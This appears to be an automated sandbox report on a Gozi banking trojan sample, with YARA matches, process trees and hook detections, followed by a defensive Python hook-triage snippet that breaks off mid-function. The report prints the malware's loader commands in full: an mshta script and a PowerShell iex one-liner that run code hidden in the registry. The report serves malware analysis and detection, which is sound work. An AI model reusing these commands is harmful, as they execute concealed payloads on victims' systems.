Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Windows\System32\control.exe Code function: 12_2_004A0A50 NtQueryInformationProcess, 12_2_004A0A50
Source: C:\Windows\System32\control.exe Code function: 12_2_0049342C NtSetInformationProcess, 12_2_0049342C
Source: C:\Windows\System32\control.exe Code function: 12_2_00494E14 NtQueryInformationProcess, 12_2_00494E14
Source: C:\Windows\System32\control.exe Code function: 12_2_0049E6C4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 12_2_0049E6C4
Source: C:\Windows\System32\control.exe Code function: 12_2_004BD002 NtProtectVirtualMemory,NtProtectVirtualMemory, 12_2_004BD002
Source: bf.exe, 00000000.00000003.676183930.0000000003FC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs bf.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: bf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bf.exe Virustotal: Detection: 76%
Source: bf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\bf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\bf.exe C:\Users\user\Desktop\bf.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
Source: C:\Users\user\Desktop\bf.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Users\user\Desktop\bf.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" Jump to behavior
Source: C:\Users\user\Desktop\bf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sgyoy32.ak1.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@15/16@2/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{44FBAADD-D3CD-1679-7DB8-B7AA016CDB7E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{203ACFCB-FFA6-5208-8954-A3A6CDC8873A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
Source: C:\Users\user\Desktop\bf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ntdll.pdb source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA26CE521C
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA26CE5200
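The four explorer.exe lines above record one export whose first bytes were rewritten (the inline hook on KERNEL32!CreateProcessAsUserW) and import/export table entries that now resolve somewhere other than the module that owns the function. The Python below is an added example, not sandbox or sample code, showing how an analyst triages such findings from a process dump: compare each export's first bytes with a clean mapping of the same module and decode the trampoline that was written over them, and check that every IAT/EAT entry still resolves inside its owner's image range. All prologue bytes, addresses and table contents are constructed for the demonstration and are not taken from the analysed dump; reading the live bytes (ReadProcessMemory, a minidump) is the caller's job. The clean copy must be mapped with relocations applied, otherwise every absolute operand will differ and the comparison reports a patch on every export.

```python
"""
Hook triage for the explorer.exe findings above: one export whose first bytes
were rewritten (inline hook) and import/export entries that no longer resolve
into the owning module (IAT/EAT hook). Added example, not sandbox or sample
code; prologue bytes, addresses and table contents are constructed for the
demonstration and do not come from the analysed dump.
"""
import struct
from dataclasses import dataclass


@dataclass
class HookFinding:
    function: str
    kind: str       # "inline" or "table"
    detail: str


def decode_redirect(live, addr=None):
    """Recognise the usual trampolines written over a function's first bytes.
    addr is the function's address in the target process, if known, so that
    relative targets can be resolved. Returns a description or None."""
    if len(live) >= 5 and live[0] == 0xE9:                      # jmp rel32
        rel = struct.unpack_from("<i", live, 1)[0]
        return f"jmp rel32 -> {addr + 5 + rel:#x}" if addr is not None else "jmp rel32"
    if len(live) >= 6 and live[:2] == b"\xff\x25":              # jmp [rip+disp32] on x64
        disp = struct.unpack_from("<i", live, 2)[0]
        slot = f" (pointer slot at {addr + 6 + disp:#x})" if addr is not None else ""
        return f"jmp [rip+{disp:#x}]{slot}"
    if len(live) >= 12 and live[:2] == b"\x48\xb8" and live[10:12] == b"\xff\xe0":
        imm = struct.unpack_from("<Q", live, 2)[0]              # mov rax, imm64 ; jmp rax
        return f"mov rax, {imm:#x}; jmp rax"
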